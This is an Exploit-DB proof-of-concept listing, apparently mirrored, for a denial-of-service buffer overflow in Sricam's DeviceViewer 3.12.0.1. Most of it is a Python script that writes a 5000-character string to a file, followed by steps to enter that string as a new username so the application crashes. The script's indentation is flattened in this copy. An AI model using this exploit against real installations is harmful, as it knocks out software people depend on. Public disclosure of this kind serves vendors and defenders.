DeviceViewer 3.12.0.1 – ‘creating user’ Denial of Service

  • 作者: x00pwn
    日期: 2019-09-24
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/47410/
  • #!/usr/bin/python
    
    # Exploit Title: DeviceViewer 3.12.0.1 - 'creating user' DOS buffer overflow
    # Date: 9/23/2019
    # Exploit Author: x00pwn
    # Vendor Homepage: http://www.sricam.com/
    # Software Link: http://download.sricam.com/Manual/DeviceViewer.exe
    # Version: v3.12.0.1
    # Tested on: Windows 7
    
    # Steps to reproduce:
    # 1. Generate a malicious payload via the POC
    # 2. In the Sricam application create a new user
    # 3. When creating a new user, set the username as the malicious payload
    # 4. Observe a program DOScrash
    
    payload = "A" * 5000
    
    try:
    evilCreate =open("exploit.txt","w")
    print("""
    DeviceViewer 3.12.0.1 DOS exploit POC
    Author: Nu11pwn
    """)
    print("[x] Creating malicious file")
    evilCreate.write(payload)
    evilCreate.close()
    print("[x] Malicious file create")
    print("[x] When creating a new user, set the username to the file contents")
    print("[x] Watch the program crash")
    except:
    print("[!] File failed to be created")